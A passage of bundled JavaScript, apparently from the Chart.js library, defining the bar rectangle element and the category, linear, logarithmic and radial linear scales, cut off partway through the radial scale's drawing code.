'use strict';
module.exports = function (Chart) {
var globalOpts = Chart.defaults.global;
globalOpts.elements.rectangle = {
backgroundColor: globalOpts.defaultColor,
borderWidth: 0,
borderColor: globalOpts.defaultColor,
borderSkipped: 'bottom'
};
function isVertical(bar) {
return bar._view.width !== undefined;
}
/**
* Helper function to get the bounds of the bar regardless of the orientation
* @private
* @param bar {Chart.Element.Rectangle} the bar
* @return {Bounds} bounds of the bar
*/
function getBarBounds(bar) {
var vm = bar._view;
var x1, x2, y1, y2;
if (isVertical(bar)) {
// vertical
var halfWidth = vm.width / 2;
x1 = vm.x - halfWidth;
x2 = vm.x + halfWidth;
y1 = Math.min(vm.y, vm.base);
y2 = Math.max(vm.y, vm.base);
} else {
// horizontal bar
var halfHeight = vm.height / 2;
x1 = Math.min(vm.x, vm.base);
x2 = Math.max(vm.x, vm.base);
y1 = vm.y - halfHeight;
y2 = vm.y + halfHeight;
}
return {
left: x1,
top: y1,
right: x2,
bottom: y2
};
}
Chart.elements.Rectangle = Chart.Element.extend({
draw: function () {
var ctx = this._chart.ctx;
var vm = this._view;
var halfWidth = vm.width / 2,
leftX = vm.x - halfWidth,
rightX = vm.x + halfWidth,
top = vm.base - (vm.base - vm.y),
halfStroke = vm.borderWidth / 2;
// Canvas doesn't allow us to stroke inside the width so we can
// adjust the sizes to fit if we're setting a stroke on the line
if (vm.borderWidth) {
leftX += halfStroke;
rightX -= halfStroke;
top += halfStroke;
}
ctx.beginPath();
ctx.fillStyle = vm.backgroundColor;
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
// Corner points, from bottom-left to bottom-right clockwise
// | 1 2 |
// | 0 3 |
var corners = [
[leftX, vm.base],
[leftX, top],
[rightX, top],
[rightX, vm.base]
];
// Find first (starting) corner with fallback to 'bottom'
var borders = ['bottom', 'left', 'top', 'right'];
var startCorner = borders.indexOf(vm.borderSkipped, 0);
if (startCorner === -1) {
startCorner = 0;
}
function cornerAt(index) {
return corners[(startCorner + index) % 4];
}
// Draw rectangle from 'startCorner'
var corner = cornerAt(0);
ctx.moveTo(corner[0], corner[1]);
for (var i = 1; i < 4; i++) {
corner = cornerAt(i);
ctx.lineTo(corner[0], corner[1]);
}
ctx.fill();
if (vm.borderWidth) {
ctx.stroke();
}
},
height: function () {
var vm = this._view;
return vm.base - vm.y;
},
inRange: function (mouseX, mouseY) {
var inRange = false;
if (this._view) {
var bounds = getBarBounds(this);
inRange = mouseX >= bounds.left && mouseX <= bounds.right && mouseY >= bounds.top && mouseY <= bounds.bottom;
}
return inRange;
},
inLabelRange: function (mouseX, mouseY) {
var me = this;
if (!me._view) {
return false;
}
var inRange = false;
var bounds = getBarBounds(me);
if (isVertical(me)) {
inRange = mouseX >= bounds.left && mouseX <= bounds.right;
} else {
inRange = mouseY >= bounds.top && mouseY <= bounds.bottom;
}
return inRange;
},
inXRange: function (mouseX) {
var bounds = getBarBounds(this);
return mouseX >= bounds.left && mouseX <= bounds.right;
},
inYRange: function (mouseY) {
var bounds = getBarBounds(this);
return mouseY >= bounds.top && mouseY <= bounds.bottom;
},
getCenterPoint: function () {
var vm = this._view;
var x, y;
if (isVertical(this)) {
x = vm.x;
y = (vm.y + vm.base) / 2;
} else {
x = (vm.x + vm.base) / 2;
y = vm.y;
}
return {x: x, y: y};
},
getArea: function () {
var vm = this._view;
return vm.width * Math.abs(vm.y - vm.base);
},
tooltipPosition: function () {
var vm = this._view;
return {
x: vm.x,
y: vm.y
};
}
});
};
}, {}], 41: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
// Default config for a category scale
var defaultConfig = {
position: 'bottom'
};
var DatasetScale = Chart.Scale.extend({
/**
* Internal function to get the correct labels. If data.xLabels or data.yLabels are defined, use those
* else fall back to data.labels
* @private
*/
getLabels: function () {
var data = this.chart.data;
return (this.isHorizontal() ? data.xLabels : data.yLabels) || data.labels;
},
// Implement this so that
determineDataLimits: function () {
var me = this;
var labels = me.getLabels();
me.minIndex = 0;
me.maxIndex = labels.length - 1;
var findIndex;
if (me.options.ticks.min !== undefined) {
// user specified min value
findIndex = helpers.indexOf(labels, me.options.ticks.min);
me.minIndex = findIndex !== -1 ? findIndex : me.minIndex;
}
if (me.options.ticks.max !== undefined) {
// user specified max value
findIndex = helpers.indexOf(labels, me.options.ticks.max);
me.maxIndex = findIndex !== -1 ? findIndex : me.maxIndex;
}
me.min = labels[me.minIndex];
me.max = labels[me.maxIndex];
},
buildTicks: function () {
var me = this;
var labels = me.getLabels();
// If we are viewing some subset of labels, slice the original array
me.ticks = (me.minIndex === 0 && me.maxIndex === labels.length - 1) ? labels : labels.slice(me.minIndex, me.maxIndex + 1);
},
getLabelForIndex: function (index, datasetIndex) {
var me = this;
var data = me.chart.data;
var isHorizontal = me.isHorizontal();
if ((data.xLabels && isHorizontal) || (data.yLabels && !isHorizontal)) {
return me.getRightValue(data.datasets[datasetIndex].data[index]);
}
return me.ticks[index];
},
// Used to get data value locations. Value can either be an index or a numerical value
getPixelForValue: function (value, index, datasetIndex, includeOffset) {
var me = this;
// 1 is added because we need the length but we have the indexes
var offsetAmt = Math.max((me.maxIndex + 1 - me.minIndex - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
if (value !== undefined && isNaN(index)) {
var labels = me.getLabels();
var idx = labels.indexOf(value);
index = idx !== -1 ? idx : index;
}
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueWidth = innerWidth / offsetAmt;
var widthOffset = (valueWidth * (index - me.minIndex)) + me.paddingLeft;
if (me.options.gridLines.offsetGridLines && includeOffset || me.maxIndex === me.minIndex && includeOffset) {
widthOffset += (valueWidth / 2);
}
return me.left + Math.round(widthOffset);
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
var valueHeight = innerHeight / offsetAmt;
var heightOffset = (valueHeight * (index - me.minIndex)) + me.paddingTop;
if (me.options.gridLines.offsetGridLines && includeOffset) {
heightOffset += (valueHeight / 2);
}
return me.top + Math.round(heightOffset);
},
getPixelForTick: function (index, includeOffset) {
return this.getPixelForValue(this.ticks[index], index + this.minIndex, null, includeOffset);
},
getValueForPixel: function (pixel) {
var me = this;
var value;
var offsetAmt = Math.max((me.ticks.length - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
var horz = me.isHorizontal();
var innerDimension = horz ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
var valueDimension = innerDimension / offsetAmt;
pixel -= horz ? me.left : me.top;
if (me.options.gridLines.offsetGridLines) {
pixel -= (valueDimension / 2);
}
pixel -= horz ? me.paddingLeft : me.paddingTop;
if (pixel <= 0) {
value = 0;
} else {
value = Math.round(pixel / valueDimension);
}
return value;
},
getBasePixel: function () {
return this.bottom;
}
});
Chart.scaleService.registerScaleType('category', DatasetScale, defaultConfig);
};
}, {}], 42: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var defaultConfig = {
position: 'left',
ticks: {
callback: Chart.Ticks.formatters.linear
}
};
var LinearScale = Chart.LinearScaleBase.extend({
determineDataLimits: function () {
var me = this;
var opts = me.options;
var chart = me.chart;
var data = chart.data;
var datasets = data.datasets;
var isHorizontal = me.isHorizontal();
function IDMatches(meta) {
return isHorizontal ? meta.xAxisID === me.id : meta.yAxisID === me.id;
}
// First Calculate the range
me.min = null;
me.max = null;
if (opts.stacked) {
var valuesPerType = {};
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (valuesPerType[meta.type] === undefined) {
valuesPerType[meta.type] = {
positiveValues: [],
negativeValues: []
};
}
// Store these per type
var positiveValues = valuesPerType[meta.type].positiveValues;
var negativeValues = valuesPerType[meta.type].negativeValues;
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
positiveValues[index] = positiveValues[index] || 0;
negativeValues[index] = negativeValues[index] || 0;
if (opts.relativePoints) {
positiveValues[index] = 100;
} else if (value < 0) {
negativeValues[index] += value;
} else {
positiveValues[index] += value;
}
});
}
});
helpers.each(valuesPerType, function (valuesForType) {
var values = valuesForType.positiveValues.concat(valuesForType.negativeValues);
var minVal = helpers.min(values);
var maxVal = helpers.max(values);
me.min = me.min === null ? minVal : Math.min(me.min, minVal);
me.max = me.max === null ? maxVal : Math.max(me.max, maxVal);
});
} else {
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
});
}
});
}
// Common base implementation to handle ticks.min, ticks.max, ticks.beginAtZero
this.handleTickRangeOptions();
},
getTickLimit: function () {
var maxTicks;
var me = this;
var tickOpts = me.options.ticks;
if (me.isHorizontal()) {
maxTicks = Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(me.width / 50));
} else {
// The factor of 2 used to scale the font size has been experimentally determined.
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, Chart.defaults.global.defaultFontSize);
maxTicks = Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(me.height / (2 * tickFontSize)));
}
return maxTicks;
},
// Called after the ticks are built. We need
handleDirectionalChanges: function () {
if (!this.isHorizontal()) {
// We are in a vertical orientation. The top value is the highest. So reverse the array
this.ticks.reverse();
}
},
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
// Utils
getPixelForValue: function (value) {
// This must be called after fit has been run so that
// this.left, this.top, this.right, and this.bottom have been defined
var me = this;
var paddingLeft = me.paddingLeft;
var paddingBottom = me.paddingBottom;
var start = me.start;
var rightValue = +me.getRightValue(value);
var pixel;
var innerDimension;
var range = me.end - start;
if (me.isHorizontal()) {
innerDimension = me.width - (paddingLeft + me.paddingRight);
pixel = me.left + (innerDimension / range * (rightValue - start));
return Math.round(pixel + paddingLeft);
}
innerDimension = me.height - (me.paddingTop + paddingBottom);
pixel = (me.bottom - paddingBottom) - (innerDimension / range * (rightValue - start));
return Math.round(pixel);
},
getValueForPixel: function (pixel) {
var me = this;
var isHorizontal = me.isHorizontal();
var paddingLeft = me.paddingLeft;
var paddingBottom = me.paddingBottom;
var innerDimension = isHorizontal ? me.width - (paddingLeft + me.paddingRight) : me.height - (me.paddingTop + paddingBottom);
var offset = (isHorizontal ? pixel - me.left - paddingLeft : me.bottom - paddingBottom - pixel) / innerDimension;
return me.start + ((me.end - me.start) * offset);
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.ticksAsNumbers[index]);
}
});
Chart.scaleService.registerScaleType('linear', LinearScale, defaultConfig);
};
}, {}], 43: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
noop = helpers.noop;
Chart.LinearScaleBase = Chart.Scale.extend({
handleTickRangeOptions: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// If we are forcing it to begin at 0, but 0 will already be rendered on the chart,
// do nothing since that would make the chart weird. If the user really wants a weird chart
// axis, they can manually override it
if (tickOpts.beginAtZero) {
var minSign = helpers.sign(me.min);
var maxSign = helpers.sign(me.max);
if (minSign < 0 && maxSign < 0) {
// move the top up to 0
me.max = 0;
} else if (minSign > 0 && maxSign > 0) {
// move the bottom down to 0
me.min = 0;
}
}
if (tickOpts.min !== undefined) {
me.min = tickOpts.min;
} else if (tickOpts.suggestedMin !== undefined) {
me.min = Math.min(me.min, tickOpts.suggestedMin);
}
if (tickOpts.max !== undefined) {
me.max = tickOpts.max;
} else if (tickOpts.suggestedMax !== undefined) {
me.max = Math.max(me.max, tickOpts.suggestedMax);
}
if (me.min === me.max) {
me.max++;
if (!tickOpts.beginAtZero) {
me.min--;
}
}
},
getTickLimit: noop,
handleDirectionalChanges: noop,
buildTicks: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// Figure out what the max number of ticks we can support it is based on the size of
// the axis area. For now, we say that the minimum tick spacing in pixels must be 50
// We also limit the maximum number of ticks to 11 which gives a nice 10 squares on
// the graph. Make sure we always have at least 2 ticks
var maxTicks = me.getTickLimit();
maxTicks = Math.max(2, maxTicks);
var numericGeneratorOptions = {
maxTicks: maxTicks,
min: tickOpts.min,
max: tickOpts.max,
stepSize: helpers.getValueOrDefault(tickOpts.fixedStepSize, tickOpts.stepSize)
};
var ticks = me.ticks = Chart.Ticks.generators.linear(numericGeneratorOptions, me);
me.handleDirectionalChanges();
// At this point, we need to update our max and min given the tick values since we have expanded the
// range of the scale
me.max = helpers.max(ticks);
me.min = helpers.min(ticks);
if (tickOpts.reverse) {
ticks.reverse();
me.start = me.max;
me.end = me.min;
} else {
me.start = me.min;
me.end = me.max;
}
},
convertTicksToLabels: function () {
var me = this;
me.ticksAsNumbers = me.ticks.slice();
me.zeroLineIndex = me.ticks.indexOf(0);
Chart.Scale.prototype.convertTicksToLabels.call(me);
}
});
};
}, {}], 44: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var defaultConfig = {
position: 'left',
// label settings
ticks: {
callback: Chart.Ticks.formatters.logarithmic
}
};
var LogarithmicScale = Chart.Scale.extend({
determineDataLimits: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
var chart = me.chart;
var data = chart.data;
var datasets = data.datasets;
var getValueOrDefault = helpers.getValueOrDefault;
var isHorizontal = me.isHorizontal();
function IDMatches(meta) {
return isHorizontal ? meta.xAxisID === me.id : meta.yAxisID === me.id;
}
// Calculate Range
me.min = null;
me.max = null;
me.minNotZero = null;
if (opts.stacked) {
var valuesPerType = {};
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
if (valuesPerType[meta.type] === undefined) {
valuesPerType[meta.type] = [];
}
helpers.each(dataset.data, function (rawValue, index) {
var values = valuesPerType[meta.type];
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
values[index] = values[index] || 0;
if (opts.relativePoints) {
values[index] = 100;
} else {
// Don't need to split positive and negative since the log scale can't handle a 0 crossing
values[index] += value;
}
});
}
});
helpers.each(valuesPerType, function (valuesForType) {
var minVal = helpers.min(valuesForType);
var maxVal = helpers.max(valuesForType);
me.min = me.min === null ? minVal : Math.min(me.min, minVal);
me.max = me.max === null ? maxVal : Math.max(me.max, maxVal);
});
} else {
helpers.each(datasets, function (dataset, datasetIndex) {
var meta = chart.getDatasetMeta(datasetIndex);
if (chart.isDatasetVisible(datasetIndex) && IDMatches(meta)) {
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
if (value !== 0 && (me.minNotZero === null || value < me.minNotZero)) {
me.minNotZero = value;
}
});
}
});
}
me.min = getValueOrDefault(tickOpts.min, me.min);
me.max = getValueOrDefault(tickOpts.max, me.max);
if (me.min === me.max) {
if (me.min !== 0 && me.min !== null) {
me.min = Math.pow(10, Math.floor(helpers.log10(me.min)) - 1);
me.max = Math.pow(10, Math.floor(helpers.log10(me.max)) + 1);
} else {
me.min = 1;
me.max = 10;
}
}
},
buildTicks: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
var generationOptions = {
min: tickOpts.min,
max: tickOpts.max
};
var ticks = me.ticks = Chart.Ticks.generators.logarithmic(generationOptions, me);
if (!me.isHorizontal()) {
// We are in a vertical orientation. The top value is the highest. So reverse the array
ticks.reverse();
}
// At this point, we need to update our max and min given the tick values since we have expanded the
// range of the scale
me.max = helpers.max(ticks);
me.min = helpers.min(ticks);
if (tickOpts.reverse) {
ticks.reverse();
me.start = me.max;
me.end = me.min;
} else {
me.start = me.min;
me.end = me.max;
}
},
convertTicksToLabels: function () {
this.tickValues = this.ticks.slice();
Chart.Scale.prototype.convertTicksToLabels.call(this);
},
// Get the correct tooltip label
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.tickValues[index]);
},
getPixelForValue: function (value) {
var me = this;
var innerDimension;
var pixel;
var start = me.start;
var newVal = +me.getRightValue(value);
var range;
var paddingTop = me.paddingTop;
var paddingBottom = me.paddingBottom;
var paddingLeft = me.paddingLeft;
var opts = me.options;
var tickOpts = opts.ticks;
if (me.isHorizontal()) {
range = helpers.log10(me.end) - helpers.log10(start); // todo: if start === 0
if (newVal === 0) {
pixel = me.left + paddingLeft;
} else {
innerDimension = me.width - (paddingLeft + me.paddingRight);
pixel = me.left + (innerDimension / range * (helpers.log10(newVal) - helpers.log10(start)));
pixel += paddingLeft;
}
} else {
// Bottom - top since pixels increase downward on a screen
innerDimension = me.height - (paddingTop + paddingBottom);
if (start === 0 && !tickOpts.reverse) {
range = helpers.log10(me.end) - helpers.log10(me.minNotZero);
if (newVal === start) {
pixel = me.bottom - paddingBottom;
} else if (newVal === me.minNotZero) {
pixel = me.bottom - paddingBottom - innerDimension * 0.02;
} else {
pixel = me.bottom - paddingBottom - innerDimension * 0.02 - (innerDimension * 0.98 / range * (helpers.log10(newVal) - helpers.log10(me.minNotZero)));
}
} else if (me.end === 0 && tickOpts.reverse) {
range = helpers.log10(me.start) - helpers.log10(me.minNotZero);
if (newVal === me.end) {
pixel = me.top + paddingTop;
} else if (newVal === me.minNotZero) {
pixel = me.top + paddingTop + innerDimension * 0.02;
} else {
pixel = me.top + paddingTop + innerDimension * 0.02 + (innerDimension * 0.98 / range * (helpers.log10(newVal) - helpers.log10(me.minNotZero)));
}
} else {
range = helpers.log10(me.end) - helpers.log10(start);
innerDimension = me.height - (paddingTop + paddingBottom);
pixel = (me.bottom - paddingBottom) - (innerDimension / range * (helpers.log10(newVal) - helpers.log10(start)));
}
}
return pixel;
},
getValueForPixel: function (pixel) {
var me = this;
var range = helpers.log10(me.end) - helpers.log10(me.start);
var value, innerDimension;
if (me.isHorizontal()) {
innerDimension = me.width - (me.paddingLeft + me.paddingRight);
value = me.start * Math.pow(10, (pixel - me.left - me.paddingLeft) * range / innerDimension);
} else { // todo: if start === 0
innerDimension = me.height - (me.paddingTop + me.paddingBottom);
value = Math.pow(10, (me.bottom - me.paddingBottom - pixel) * range / innerDimension) / me.start;
}
return value;
}
});
Chart.scaleService.registerScaleType('logarithmic', LogarithmicScale, defaultConfig);
};
}, {}], 45: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var globalDefaults = Chart.defaults.global;
var defaultConfig = {
display: true,
// Boolean - Whether to animate scaling the chart from the centre
animate: true,
lineArc: false,
position: 'chartArea',
angleLines: {
display: true,
color: 'rgba(0, 0, 0, 0.1)',
lineWidth: 1
},
// label settings
ticks: {
// Boolean - Show a backdrop to the scale label
showLabelBackdrop: true,
// String - The colour of the label backdrop
backdropColor: 'rgba(255,255,255,0.75)',
// Number - The backdrop padding above & below the label in pixels
backdropPaddingY: 2,
// Number - The backdrop padding to the side of the label in pixels
backdropPaddingX: 2,
callback: Chart.Ticks.formatters.linear
},
pointLabels: {
// Number - Point label font size in pixels
fontSize: 10,
// Function - Used to convert point labels
callback: function (label) {
return label;
}
}
};
var LinearRadialScale = Chart.LinearScaleBase.extend({
getValueCount: function () {
return this.chart.data.labels.length;
},
setDimensions: function () {
var me = this;
var opts = me.options;
var tickOpts = opts.ticks;
// Set the unconstrained dimension before label rotation
me.width = me.maxWidth;
me.height = me.maxHeight;
me.xCenter = Math.round(me.width / 2);
me.yCenter = Math.round(me.height / 2);
var minSize = helpers.min([me.height, me.width]);
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
me.drawingArea = opts.display ? (minSize / 2) - (tickFontSize / 2 + tickOpts.backdropPaddingY) : (minSize / 2);
},
determineDataLimits: function () {
var me = this;
var chart = me.chart;
me.min = null;
me.max = null;
helpers.each(chart.data.datasets, function (dataset, datasetIndex) {
if (chart.isDatasetVisible(datasetIndex)) {
var meta = chart.getDatasetMeta(datasetIndex);
helpers.each(dataset.data, function (rawValue, index) {
var value = +me.getRightValue(rawValue);
if (isNaN(value) || meta.data[index].hidden) {
return;
}
if (me.min === null) {
me.min = value;
} else if (value < me.min) {
me.min = value;
}
if (me.max === null) {
me.max = value;
} else if (value > me.max) {
me.max = value;
}
});
}
});
// Common base implementation to handle ticks.min, ticks.max, ticks.beginAtZero
me.handleTickRangeOptions();
},
getTickLimit: function () {
var tickOpts = this.options.ticks;
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
return Math.min(tickOpts.maxTicksLimit ? tickOpts.maxTicksLimit : 11, Math.ceil(this.drawingArea / (1.5 * tickFontSize)));
},
convertTicksToLabels: function () {
var me = this;
Chart.LinearScaleBase.prototype.convertTicksToLabels.call(me);
// Point labels
me.pointLabels = me.chart.data.labels.map(me.options.pointLabels.callback, me);
},
getLabelForIndex: function (index, datasetIndex) {
return +this.getRightValue(this.chart.data.datasets[datasetIndex].data[index]);
},
fit: function () {
/*
* Right, this is really confusing and there is a lot of maths going on here
* The gist of the problem is here: https://gist.github.com/nnnick/696cc9c55f4b0beb8fe9
*
* Reaction: https://dl.dropboxusercontent.com/u/34601363/toomuchscience.gif
*
* Solution:
*
* We assume the radius of the polygon is half the size of the canvas at first
* at each index we check if the text overlaps.
*
* Where it does, we store that angle and that index.
*
* After finding the largest index and angle we calculate how much we need to remove
* from the shape radius to move the point inwards by that x.
*
* We average the left and right distances to get the maximum shape radius that can fit in the box
* along with labels.
*
* Once we have that, we can find the centre point for the chart, by taking the x text protrusion
* on each side, removing that from the size, halving it and adding the left x protrusion width.
*
* This will mean we have a shape fitted to the canvas, as large as it can be with the labels
* and position it in the most space efficient manner
*
* https://dl.dropboxusercontent.com/u/34601363/yeahscience.gif
*/
var pointLabels = this.options.pointLabels;
var pointLabelFontSize = helpers.getValueOrDefault(pointLabels.fontSize, globalDefaults.defaultFontSize);
var pointLabeFontStyle = helpers.getValueOrDefault(pointLabels.fontStyle, globalDefaults.defaultFontStyle);
var pointLabeFontFamily = helpers.getValueOrDefault(pointLabels.fontFamily, globalDefaults.defaultFontFamily);
var pointLabeFont = helpers.fontString(pointLabelFontSize, pointLabeFontStyle, pointLabeFontFamily);
// Get maximum radius of the polygon. Either half the height (minus the text width) or half the width.
// Use this to calculate the offset + change. - Make sure L/R protrusion is at least 0 to stop issues with centre points
var largestPossibleRadius = helpers.min([(this.height / 2 - pointLabelFontSize - 5), this.width / 2]),
pointPosition,
i,
textWidth,
halfTextWidth,
furthestRight = this.width,
furthestRightIndex,
furthestRightAngle,
furthestLeft = 0,
furthestLeftIndex,
furthestLeftAngle,
xProtrusionLeft,
xProtrusionRight,
radiusReductionRight,
radiusReductionLeft;
this.ctx.font = pointLabeFont;
for (i = 0; i < this.getValueCount(); i++) {
// 5px to space the text slightly out - similar to what we do in the draw function.
pointPosition = this.getPointPosition(i, largestPossibleRadius);
textWidth = this.ctx.measureText(this.pointLabels[i] ? this.pointLabels[i] : '').width + 5;
// Add quarter circle to make degree 0 mean top of circle
var angleRadians = this.getIndexAngle(i) + (Math.PI / 2);
var angle = (angleRadians * 360 / (2 * Math.PI)) % 360;
if (angle === 0 || angle === 180) {
// At angle 0 and 180, we're at exactly the top/bottom
// of the radar chart, so text will be aligned centrally, so we'll half it and compare
// w/left and right text sizes
halfTextWidth = textWidth / 2;
if (pointPosition.x + halfTextWidth > furthestRight) {
furthestRight = pointPosition.x + halfTextWidth;
furthestRightIndex = i;
}
if (pointPosition.x - halfTextWidth < furthestLeft) {
furthestLeft = pointPosition.x - halfTextWidth;
furthestLeftIndex = i;
}
} else if (angle < 180) {
// Less than half the values means we'll left align the text
if (pointPosition.x + textWidth > furthestRight) {
furthestRight = pointPosition.x + textWidth;
furthestRightIndex = i;
}
// More than half the values means we'll right align the text
} else if (pointPosition.x - textWidth < furthestLeft) {
furthestLeft = pointPosition.x - textWidth;
furthestLeftIndex = i;
}
}
xProtrusionLeft = furthestLeft;
xProtrusionRight = Math.ceil(furthestRight - this.width);
furthestRightAngle = this.getIndexAngle(furthestRightIndex);
furthestLeftAngle = this.getIndexAngle(furthestLeftIndex);
radiusReductionRight = xProtrusionRight / Math.sin(furthestRightAngle + Math.PI / 2);
radiusReductionLeft = xProtrusionLeft / Math.sin(furthestLeftAngle + Math.PI / 2);
// Ensure we actually need to reduce the size of the chart
radiusReductionRight = (helpers.isNumber(radiusReductionRight)) ? radiusReductionRight : 0;
radiusReductionLeft = (helpers.isNumber(radiusReductionLeft)) ? radiusReductionLeft : 0;
this.drawingArea = Math.round(largestPossibleRadius - (radiusReductionLeft + radiusReductionRight) / 2);
this.setCenterPoint(radiusReductionLeft, radiusReductionRight);
},
setCenterPoint: function (leftMovement, rightMovement) {
var me = this;
var maxRight = me.width - rightMovement - me.drawingArea,
maxLeft = leftMovement + me.drawingArea;
me.xCenter = Math.round(((maxLeft + maxRight) / 2) + me.left);
// Always vertically in the centre as the text height doesn't change
me.yCenter = Math.round((me.height / 2) + me.top);
},
getIndexAngle: function (index) {
var angleMultiplier = (Math.PI * 2) / this.getValueCount();
var startAngle = this.chart.options && this.chart.options.startAngle ?
this.chart.options.startAngle :
0;
var startAngleRadians = startAngle * Math.PI * 2 / 360;
// Start from the top instead of right, so remove a quarter of the circle
return index * angleMultiplier - (Math.PI / 2) + startAngleRadians;
},
getDistanceFromCenterForValue: function (value) {
var me = this;
if (value === null) {
return 0; // null always in center
}
// Take into account half font size + the yPadding of the top value
var scalingFactor = me.drawingArea / (me.max - me.min);
if (me.options.reverse) {
return (me.max - value) * scalingFactor;
}
return (value - me.min) * scalingFactor;
},
getPointPosition: function (index, distanceFromCenter) {
var me = this;
var thisAngle = me.getIndexAngle(index);
return {
x: Math.round(Math.cos(thisAngle) * distanceFromCenter) + me.xCenter,
y: Math.round(Math.sin(thisAngle) * distanceFromCenter) + me.yCenter
};
},
getPointPositionForValue: function (index, value) {
return this.getPointPosition(index, this.getDistanceFromCenterForValue(value));
},
getBasePosition: function () {
var me = this;
var min = me.min;
var max = me.max;
return me.getPointPositionForValue(0,
me.beginAtZero ? 0 :
min < 0 && max < 0 ? max :
min > 0 && max > 0 ? min :
0);
},
draw: function () {
var me = this;
var opts = me.options;
var gridLineOpts = opts.gridLines;
var tickOpts = opts.ticks;
var angleLineOpts = opts.angleLines;
var pointLabelOpts = opts.pointLabels;
var getValueOrDefault = helpers.getValueOrDefault;
if (opts.display) {
var ctx = me.ctx;
// Tick Font
var tickFontSize = getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = getValueOrDefault(tickOpts.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = getValueOrDefault(tickOpts.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
helpers.each(me.ticks, function (label, index) {
// Don't draw a centre value (if it is minimum)
if (index > 0 || opts.reverse) {
var yCenterOffset = me.getDistanceFromCenterForValue(me.ticksAsNumbers[index]);
var yHeight = me.yCenter - yCenterOffset;
// Draw circular lines around the scale
if (gridLineOpts.display && index !== 0) {
ctx.strokeStyle = helpers.getValueAtIndexOrDefault(gridLineOpts.color, index - 1);
ctx.lineWidth = helpers.getValueAtIndexOrDefault(gridLineOpts.lineWidth, index - 1);
if (opts.lineArc) {
// Draw circular arcs between the points
ctx.beginPath();
ctx.arc(me.xCenter, me.yCenter, yCenterOffset, 0, Math.PI * 2);
ctx.closePath();
ctx.stroke();
} else {
// Draw straight lines connecting each index
ctx.beginPath();
for (var i = 0; i < me.getValueCount(); i++) {
var pointPosition = me.getPointPosition(i, yCenterOffset);
if (i === 0) {
ctx.moveTo(pointPosition.x, pointPosition.y);
} else {
ctx.lineTo(pointPosition.x, pointPosition.y);
}
}
ctx.closePath();
ctx.stroke();
}
}
if (tickOpts.display) {
var tickFontColor = getValueOrDefault(tickOpts.fontColor, globalDefaults.defaultFontColor);
ctx.font = tickLabelFont;
if (tickOpts.showLabelBackdrop) {
var labelWidth = ctx.measureText(label).width;
ctx.fillStyle = tickOpts.backdropColor;
ctx.fillRect(
me.xCenter - labelWidth / 2 - tickOpts.backdropPaddingX,
yHeight - tickFontSize / 2 - tickOpts.backdropPaddingY,
labelWidth + tickOpts.backdropPaddingX * 2,
tickFontSize + tickOpts.backdropPaddingY * 2
);
}
ctx.textAlign = 'center';
ctx.textBaseline = 'middle';
ctx.fillStyle = tickFontColor;
ctx.fillText(label, me.xCenter, yHeight);
}
}
});
if (!opts.lineArc) {
ctx.lineWidth = angleLineOpts.lineWidth;
ctx.strokeStyle = angleLineOpts.color;
var outerDistance = me.getDistanceFromCenterForValue(opts.reverse ? me.min : me.max);
// Point Label Font
var pointLabelFontSize = getValueOrDefault(pointLabelOpts.fontSize, globalDefaults.defaultFontSize);
var pointLabeFontStyle = getValueOrDefault(pointLabelOpts.fontStyle, globalDefaults.defaultFontStyle);
